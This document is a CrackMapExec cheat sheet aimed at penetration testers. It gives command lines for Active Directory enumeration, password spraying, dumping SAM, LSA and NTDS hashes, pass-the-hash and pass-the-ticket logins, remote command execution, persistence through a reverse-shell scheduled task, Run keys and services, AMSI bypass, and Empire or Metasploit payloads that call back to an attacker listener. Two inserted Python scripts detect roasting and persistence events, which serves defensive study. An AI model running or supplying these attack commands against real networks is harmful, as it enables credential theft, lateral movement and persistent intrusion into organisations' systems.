Crackmapexec Cheat Sheet


What Is CrackMapExec

CrackMapExec (CME) is an open-source hacking tool that automates gathering information, executing advanced password attacks, and performing post-exploitation activities like lateral movement. It’s designed to be a “Swiss Army knife” for targeting Windows Active Directory environments and has been used in many real-world attacks.

Some key features of CrackMapExec include:

● Active Directory Enumeration: It can enumerate Active Directory domains, forests,
users, groups, computers, and trust relationships to gather information about the
target environment.
● Credential Brute Forcing: The tool can attack various network services (e.g., SMB,
RPC, LDAP, and WinRM) with password spraying, credential stuffing, and brute force
attacks.
● Remote Code Execution: Using CrackMapExec, you can execute commands and
scripts remotely on target systems using PowerShell, WMI, SMB, and PSExec.
● Lateral Movement: CME can perform lateral movement and jump between
compromised machines on the internal corporate network using techniques like
pass-the-hash, pass-the-ticket, and token impersonation.
● Strong Integration Support: The tool's API and scripting support make it easy to
integrate with other penetration testing tools, such as Metasploit, PowerShell Empire,
and BloodHound.

CrackMapExec is an incredibly powerful tool to add to your arsenal. Its ability to conduct
post-exploitation activities against Active Directory environments is unmatched by any other
open-source tool.
Penetration testers or red teamers can harness this ability to perform thorough assessments
of an organization's security posture, identify vulnerabilities, and recommend improvements
that bolster its cyber defense.

Now that you know why you should learn CrackMapExec, let’s get our hands dirty and see
how to use it.

Installing CrackMapExec
CrackMapExec is installed by default on Kali Linux. However, there are several installation
options if you don’t want to use Kali.

Installing CrackMapExec with a package manager

You can install CrackMapExec with the apt package manager from the Kali Linux
repositories with the following command: apt install crackmapexec

If you don’t have the Kali Linux repositories installed on your machine, read how to add the
Kali Linux official repositories to the sources list.

Installing CrackMapExec with Docker

You can install CrackMapExec using Docker with the command: docker pull byt3bl33d3r/crackmapexec

Check out the installation documentation on the official website to learn how to install Docker
on your machine.

Installing CrackMapExec as a Python package


To install CrackMapExec as a Python package using the pip package installer, run the
following commands:
python3 -m pip install pipx
pipx ensurepath
pipx install crackmapexec

Here, Pipx is used to isolate all its dependencies and eliminate common installation
problems. You can also use other Python virtual environments, like venv.

Installing CrackMapExec from GitHub

Finally, you can install CrackMapExec from source using the following commands:
apt-get install -y libssl-dev libffi-dev python-dev build-essential
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
cd CrackMapExec
poetry install
poetry run crackmapexec

Once you have CrackMapExec installed, you can explore its rich feature set.

General CrackMapExec Syntax and Options


All CrackMapExec commands follow this syntax: crackmapexec [runtime options]
<service> [options] [-M module] [-o module options] <target>.

Each command line component, what it does, and examples:

[runtime options]
    Runtime options that affect the performance of the command.
    Examples:
        -h                   display the help menu
        -t THREADS           set the number of concurrent threads
        --timeout TIMEOUT    set a max timeout in seconds for each thread
        --jitter INTERVAL    set a random delay between each connection

<service>
    CrackMapExec can interact with various services running on the target machine.
    Each can be used to perform specific tasks related to enumeration, exploitation,
    or lateral movement.
    Examples: winrm, ldap, ssh, rdp, mssql, ftp, smb

[options]
    Options are specific to the service you are targeting, but there are common ones
    you will see.
    Examples:
        -u                   username
        -p                   password
        -h                   get help for that module
        -x COMMAND           execute a command on the target
        -X PS_COMMAND        execute a PowerShell command
        -L                   list the modules available for the service

[-M module]
    Each service CrackMapExec supports has various modules that you can use to
    exploit vulnerabilities, target credentials, or gather information.
    Examples:
        -M powerview         wrapper for PowerView’s functions
        -M shellinject       injects raw shellcode into memory
        -M zerologon         exploits the ZeroLogon vulnerability
        -M test_connection   pings a host

[-o module options]
    Options specific to the module you choose to run.
    Examples:
        -o LHOST=<local-host>     specify the local host for a Metasploit command
        -o LISTENER=<listener>    specify a listener for a PowerShell Empire launcher

<target>
    The IP address, network range, or hostname of the machine(s) you’re attacking.
    Examples: 192.168.1.100, 10.0.39.0/24, webserver1

Discovery and Enumeration With CrackMapExec
CrackMapExec’s smb option is great for gathering information about a target. It can identify
live hosts and collect data on domain users, groups, network shares, computers, and active
sessions.
It can even let you execute your own Windows Management Instrumentation (WMI) queries
to gather information about Active Directory objects, such as organizational units (OUs),
policies, and service accounts, while blending in with legitimate network traffic.

Commands and their descriptions:

crackmapexec <service> <target>
    Scans <target> for a specific service (e.g., winrm, ldap, ssh, rdp, mssql, ftp, smb).
    This can be used to identify live hosts and open ports.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --users <target>
    Enumerates domain users. If a user is specified, more information is returned
    (e.g., access, password policy, etc.).

crackmapexec smb -u <USERNAME> -p <PASSWORD> --groups <target>
    Enumerates domain groups. If a group is specified, more information is returned.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --shares <target>
    Enumerates shares and the access you have to them.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --computers <target>
    Enumerates domain computers (workstations and servers).

crackmapexec smb -u <USERNAME> -p <PASSWORD> --sessions <target>
    Enumerates active sessions (users currently accessing a share, whom you could
    target).

crackmapexec smb -u <USERNAME> -p <PASSWORD> --wmi <QUERY> <target>
    Executes the specified WMI query to enumerate specific information about domain
    objects.

Credential Harvesting and Brute Forcing With CrackMapExec
CrackMapExec is infamous for its password attacks and credential dumping capabilities. The
tool can run remote commands on systems to identify high-value accounts (e.g.,
Administrators) and run password spraying or brute-force attacks against those accounts.

Once it successfully logs in with a high-value account, it can use its credential dumping
features to extract NTLM hashes, cleartext passwords, and Kerberos tickets.

Commands and their descriptions:

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -x 'net localgroup administrators' <target>
    Identifies the local Administrator account across machines.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -X 'Get-LocalGroupMember -Group "Administrators"' <target>
    Identifies the local Administrator account across machines using PowerShell.

crackmapexec ldap -u <USERNAME> -p <PASSWORD> -M whoami <target>
    Identifies the local Administrator account across machines using the whoami
    command.

crackmapexec <service> -u <USERNAME> -p <PASSWORD> <target>
    Performs a password spray attack against <target>. The <USERNAME> option can be
    a single user, a list of usernames (comma separated), or a file containing
    usernames. The same goes for the <PASSWORD> option with passwords. Use the
    runtime options above to tune your attack and avoid getting locked out or
    detected.

crackmapexec <service> -u <USERNAME> -p <PASSWORD> --port <PORT> <target>
    If the service is not running on its standard port, use the --port option to
    specify the custom port.

crackmapexec <service> -u <USERNAME> -p <PASSWORD> --no-bruteforce <target>
    To try username and password combinations pairwise (e.g., user1:password1,
    user2:password2), rather than password spraying with a list of usernames and/or
    passwords, use the --no-bruteforce option.

crackmapexec <service> -u <USERNAME> -p <PASSWORD> --continue-on-success <target>
    To continue guessing login credentials even after being successful once, use the
    --continue-on-success option.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> --sam <target>
    Dumps SAM hashes from the target system after a successful login. You can use the
    smb or winrm service.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> --lsa <target>
    Dumps LSA secrets from the target system after a successful login. You can use the
    smb or winrm service.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --ntds [vss|drsuapi] <target>
    Dumps the NTDS.dit file from the target Domain Controller after a successful
    login. You can use either vss or drsuapi as the method (drsuapi is the default).

Gaining Access and Lateral Movement With CrackMapExec


CrackMapExec can target services like SMB, WinRM, and LDAP to gain access to target
machines. It can use usernames, passwords, hashes, and Kerberos tickets to authenticate
to these services using pass-the-hash and pass-the-ticket attacks.

Once you’ve gained access to a machine, CrackMapExec is a great tool for performing
lateral movement. It can execute custom commands against multiple machines and blend
into legitimate traffic using commonly used protocols.

Commands and their descriptions:

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> --sam <target>
    Dumps SAM hashes from the target system after a successful login. You can use the
    smb or winrm service.

crackmapexec ldap -u <USERNAME> -p <PASSWORD> --asreproast <target>
    Gets the AS-REP response ready to crack with Hashcat to perform AS-REP roasting.

crackmapexec ldap -u <USERNAME> -p <PASSWORD> --kerberoasting <target>
    Gets the TGS ticket ready to crack with Hashcat to perform Kerberoasting.

crackmapexec <service> -H <HASH> <target>
    For services that use NTLM (e.g., winrm, rdp, smb, ldap, mssql), you can log in
    using NTLM hashes. Use the -H option followed by a single hash, a list of hashes
    (comma-separated), or a file containing hashes. This is known as a pass-the-hash
    attack.

crackmapexec <service> -k <KERBEROS_TICKET> <target>
    For services that use Kerberos (e.g., winrm, rdp, smb, ldap, mssql), you can log
    in using a Kerberos ticket. Use the -k option followed by a Kerberos ticket. This
    is known as a pass-the-ticket attack.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -x <COMMAND> <target>
    Executes the specified command on the target machine after a successful login.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --exec-method <METHOD> -x <COMMAND> <target>
    Executes the specified command on the target machine after a successful login
    using a specific method. METHOD can be mmcexec, atexec, smbexec, or wmiexec.

crackmapexec <service> -u <USERNAME> -p <PASSWORD> <target>
    Lateral movement: logs in to a remote system using the stolen username and
    password.
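The --asreproast and --kerberoasting rows above work because the KDC hands out crackable, RC4-encrypted material: a service ticket (Security event 4769) for any account that has an SPN, or a TGT reply (event 4768) for an account that does not require pre-authentication. The script below is an added detection example, not part of this cheat sheet or of CrackMapExec. The event IDs and the field values it keys on (TicketEncryptionType 0x17 for RC4-HMAC, PreAuthType 0 for no pre-authentication) are the real Windows audit values; the record layout, field names and sample events are constructed for the example.

```python
"""Flag Kerberoasting and AS-REP roasting signals in Kerberos audit events.

Added detection example; the records below are constructed sample data in a
simplified dict form (a real pipeline would map Security events 4769 and 4768,
fields TargetUserName, ServiceName, TicketEncryptionType, PreAuthType and
IpAddress, into this shape).
"""
from collections import defaultdict

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC, the etype roasting tools ask for
AES256 = "0x12"     # TicketEncryptionType for AES256, what a healthy domain should issue
NO_PREAUTH = "0"    # PreAuthType 0: TGT issued without pre-authentication

# Constructed sample. One source pulls RC4 service tickets for four different
# services in quick succession; a workstation does normal AES traffic; and one
# TGT is issued to an account that has pre-authentication disabled.
SAMPLE_EVENTS = [
    {"id": 4769, "src_ip": "10.0.39.25", "user": "alice", "service": "MSSQLSvc/db01.corp.local", "etype": RC4_HMAC},
    {"id": 4769, "src_ip": "10.0.39.25", "user": "alice", "service": "HTTP/intranet.corp.local", "etype": RC4_HMAC},
    {"id": 4769, "src_ip": "10.0.39.25", "user": "alice", "service": "svc_backup", "etype": RC4_HMAC},
    {"id": 4769, "src_ip": "10.0.39.25", "user": "alice", "service": "svc_sql", "etype": RC4_HMAC},
    {"id": 4769, "src_ip": "10.0.39.40", "user": "bob", "service": "cifs/fs01.corp.local", "etype": AES256},
    {"id": 4769, "src_ip": "10.0.39.40", "user": "bob", "service": "HTTP/intranet.corp.local", "etype": AES256},
    {"id": 4769, "src_ip": "10.0.39.40", "user": "bob", "service": "krbtgt", "etype": AES256},
    {"id": 4768, "src_ip": "10.0.39.25", "user": "dave", "service": "krbtgt", "etype": RC4_HMAC, "preauth": NO_PREAUTH},
    {"id": 4768, "src_ip": "10.0.39.40", "user": "alice", "service": "krbtgt", "etype": AES256, "preauth": "2"},
]


def kerberoast_suspects(events, min_services=3):
    """Map (src_ip, user) -> sorted service names for requesters that obtained RC4
    service tickets for at least `min_services` distinct services.

    Tickets for krbtgt are skipped: they are TGT operations, not tickets encrypted
    with a service account's password hash, so they carry nothing to crack offline.
    """
    services = defaultdict(set)
    for e in events:
        if e["id"] != 4769 or e["etype"] != RC4_HMAC:
            continue
        if e["service"].lower().startswith("krbtgt"):
            continue
        services[(e["src_ip"], e["user"])].add(e["service"])
    return {k: sorted(v) for k, v in services.items() if len(v) >= min_services}


def asrep_roast_suspects(events):
    """List (src_ip, user) pairs whose TGT was issued without pre-authentication and
    with RC4 encryption, the combination AS-REP roasting relies on. Each hit also
    names an account whose 'Do not require Kerberos preauthentication' flag should
    be reviewed."""
    return sorted(
        (e["src_ip"], e["user"])
        for e in events
        if e["id"] == 4768 and e.get("preauth") == NO_PREAUTH and e["etype"] == RC4_HMAC
    )


if __name__ == "__main__":
    for (src, user), spns in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting from {src} as {user}: {', '.join(spns)}")
    for src, user in asrep_roast_suspects(SAMPLE_EVENTS):
        print(f"AS-REP without pre-auth for {user} requested from {src}")
```

The RC4 etype is the strongest single signal, but it is not exclusive: a roasting tool can request AES tickets for accounts that have RC4 disabled, so the count of distinct service tickets per requester is what to alert on. On the mitigation side, every account these functions name is an exposure to fix, by giving service accounts long random passwords (or moving them to group managed service accounts) and by re-enabling pre-authentication where it was switched off.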

Post-Exploitation With CrackMapExec


Post-exploitation is another area where CrackMapExec shines. The tool can establish
persistence on compromised hosts, collect detailed information about the network, systems,
and installed applications, and even move files between machines.

Commands and their descriptions:

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M rdp
    Enables RDP on the target machine after a successful login. It’s useful to get an
    RDP session on the target.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M impersonate
    Logs in to the machine and lists tokens you can impersonate on the machine to
    escalate your privileges.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M install_elevated
    Checks for files with the AlwaysInstallElevated attribute that can be used to
    escalate your privileges.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M enum-avproducts
    Gathers information on all anti-virus and endpoint detection solutions installed
    on the machine.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --put-file LOCAL REMOTE
    Puts a local file onto the target machine (e.g., --put-file backdoor.exe
    \\Windows\\Temp\\backdoor.exe).

crackmapexec smb -u <USERNAME> -p <PASSWORD> --get-file REMOTE LOCAL
    Gets a remote file from the target machine (e.g., --get-file
    \\Windows\\Temp\\creds.txt creds.txt).

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M enum_dns
    Logs in to the machine and uses WMI to dump DNS from the AD DNS server.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M get_netconnections
    Uses WMI to get the target machine’s current network connections.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -M keepass_discover
    Searches for KeePass-related files and processes from which you could steal
    credentials.

crackmapexec ldap -u <USERNAME> -p <PASSWORD> -M get-network
    Retrieves information about the Active Directory network environment.

crackmapexec ldap -u <USERNAME> -p <PASSWORD> -M laps
    Retrieves Windows Local Administrator Password Solution (LAPS) passwords.

crackmapexec mssql -u <USERNAME> -p <PASSWORD> -M mssql_priv
    Automatically enumerates and exploits MSSQL privileges.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -x 'schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr <PAYLOAD>' <target>
    Persistence: creates a scheduled task on the target system that executes a
    reverse shell PAYLOAD at a specified interval or system event, after uploading
    the PAYLOAD to the machine first.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -x 'reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v <name> /t REG_SZ /d "<PAYLOAD>"' <target>
    Persistence: executes a registry PAYLOAD when the user logs in or the system
    starts up, after uploading the PAYLOAD to the machine first.

crackmapexec smb -u <USERNAME> -p <PASSWORD> --put-file <PAYLOAD> "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\<PAYLOAD>"
    Persistence: drops a PAYLOAD in the Windows startup folder, executed when the
    user logs in.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -x 'sc create <service_name> binPath= "<PAYLOAD>" start= auto' <target>
    Persistence: installs a service on the target system that executes a PAYLOAD on
    start-up, after uploading the PAYLOAD to the machine first.
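Every persistence row above leaves a creation event behind, and so do the atexec and smbexec execution methods from the lateral movement table, which create a scheduled task or a service on the target to run the command: Security event 4698 for a new scheduled task, System event 7045 for a new service and, with Sysmon deployed, event 13 for a Run-key value being set and event 11 for a file written to the Startup folder. The triage script below is an added example, not part of this cheat sheet or of CrackMapExec. The event IDs are the real ones; the record layout, field names, heuristics and sample records are this example's own.

```python
"""Triage persistence artefacts in Windows event records.

Added detection example; the records below are constructed sample data in a
simplified dict form. Event IDs are the real ones (Security 4698 task created,
System 7045 service installed, Sysmon 13 registry value set, Sysmon 11 file
created); the field names and heuristics are this example's own.
"""
import re

# Directories an ordinary user can write to. A service or task whose command runs
# from one of these was almost certainly not put there by a legitimate installer.
WRITABLE_DIRS = ("\\temp\\", "\\appdata\\", "\\users\\public\\", "\\programdata\\")
# Interpreters and living-off-the-land binaries that rarely belong in a service path.
INTERPRETERS = ("cmd.exe", "powershell", "pwsh", "mshta", "rundll32",
                "wscript", "cscript", "regsvr32")
RUN_KEY = re.compile(r"\\currentversion\\run(once)?\\", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)

# Constructed sample: four persistence artefacts mixed with three benign records.
SAMPLE_EVENTS = [
    {"id": 4698, "task": "Reverse shell", "command": "C:\\Windows\\Temp\\update.exe",
     "schedule": "MINUTE", "interval": 1},
    {"id": 7045, "service": "BackupSvc", "image": "\"C:\\Program Files\\Backup\\svc.exe\"",
     "start": "auto"},
    {"id": 7045, "service": "updsvc", "image": "cmd.exe /c C:\\Windows\\Temp\\p.exe",
     "start": "auto"},
    {"id": 13, "key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\upd",
     "data": "C:\\Users\\Public\\p.exe"},
    {"id": 11, "path": "C:\\Users\\bob\\AppData\\Roaming\\Microsoft\\Windows\\"
                       "Start Menu\\Programs\\Startup\\p.exe"},
    {"id": 11, "path": "C:\\Users\\bob\\Documents\\notes.txt"},
    {"id": 4698, "task": "VendorUpdater", "command": "C:\\Program Files\\Vendor\\update.exe",
     "schedule": "DAILY", "interval": 1},
]


def command_flags(cmd):
    """Return the reasons a task or service command line looks suspicious."""
    lowered = cmd.lower()
    reasons = []
    if any(d in lowered for d in WRITABLE_DIRS):
        reasons.append("runs from a user-writable directory")
    if any(i in lowered for i in INTERPRETERS):
        reasons.append("invokes a script interpreter or LOLBin")
    return reasons


def triage(events):
    """Return (event_id, subject, reason) for every record that matches a
    persistence heuristic, in the order the records were seen."""
    findings = []
    for e in events:
        eid = e["id"]
        if eid == 4698:
            reasons = command_flags(e["command"])
            if str(e.get("schedule", "")).upper() == "MINUTE":
                reasons.append(f"repeats every {e.get('interval')} minute(s)")
            if reasons:
                findings.append((eid, e["task"], "; ".join(reasons)))
        elif eid == 7045:
            reasons = command_flags(e["image"])
            if reasons:
                findings.append((eid, e["service"], "; ".join(reasons)))
        elif eid == 13 and RUN_KEY.search(e["key"]):
            findings.append((eid, e["key"], "autorun value set to " + e["data"]))
        elif eid == 11 and STARTUP_DIR.search(e["path"]):
            findings.append((eid, e["path"], "file dropped in a Startup folder"))
    return findings


if __name__ == "__main__":
    for eid, subject, reason in triage(SAMPLE_EVENTS):
        print(f"[{eid}] {subject}: {reason}")
```

The heuristics deliberately key on where a command runs from and how often it fires rather than on any specific payload name, since the payload is the one thing an operator controls completely; the creation event itself is what cannot be avoided.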

CrackMapExec Advanced Techniques and Integrations


CrackMapExec has more advanced features. These include the ability to run PowerShell
commands and scripts and even obfuscate them. The tool also integrates with other hacking
frameworks like Metasploit and C2 frameworks (e.g., PowerShell Empire).

Commands and their descriptions:

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -X <PS_COMMAND> <target>
    Executes a PowerShell command (PS_COMMAND) on the systems after a successful
    login.

crackmapexec <smb|winrm> -u <USERNAME> -p <PASSWORD> -X <PS_COMMAND> --obfs <target>
    Obfuscates the PowerShell scripts/commands that are run.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -X <PS_COMMAND> --amsi-bypass <FILE> <target>
    Runs PowerShell scripts and commands with a custom AMSI bypass file (FILE). This
    is a PowerShell file that implements an AMSI bypass method.

crackmapexec smb -u <USERNAME> -p <PASSWORD> -X <PS_COMMAND> --clear-obfsscripts <target>
    Clears all cached obfuscated PowerShell scripts from memory.

crackmapexec <mssql|smb> -u <USERNAME> -p <PASSWORD> -M empire_exec -o LISTENER=<listener> <target>
    Lateral movement: logs in to a remote system using a stolen username or password
    and automatically generates and executes a PowerShell Empire launcher that calls
    back to the specified <listener>. This gives you a PowerShell Empire agent on the
    system.

crackmapexec <mssql|smb> -u <USERNAME> -p <PASSWORD> --local-auth -M met_inject -o LHOST=<attack-machine> LPORT=<listening-port>
    Logs in to a remote system using the stolen username or password and
    automatically generates and injects Metasploit shellcode that calls back to a
    Metasploit handler using LHOST and LPORT. This gives you a Metasploit shell on
    the system.

Conclusion: CrackMapExec Cheat Sheet
This CrackMapExec cheat sheet includes everything you need to know to get started using
this powerful hacking tool, covering everything from enumeration to initial access and
post-exploitation.

It’s now time for you to get your hands dirty and use CrackMapExec yourself!

To learn more about CrackMapExec and ethical hacking, check out one of the courses
below. These are among the 1,000+ courses and labs in our StationX Accelerator Program.

It includes everything you need to jumpstart your cyber security career with professional
mentorship, a tailored career roadmap, and a vibrant community to support your journey.
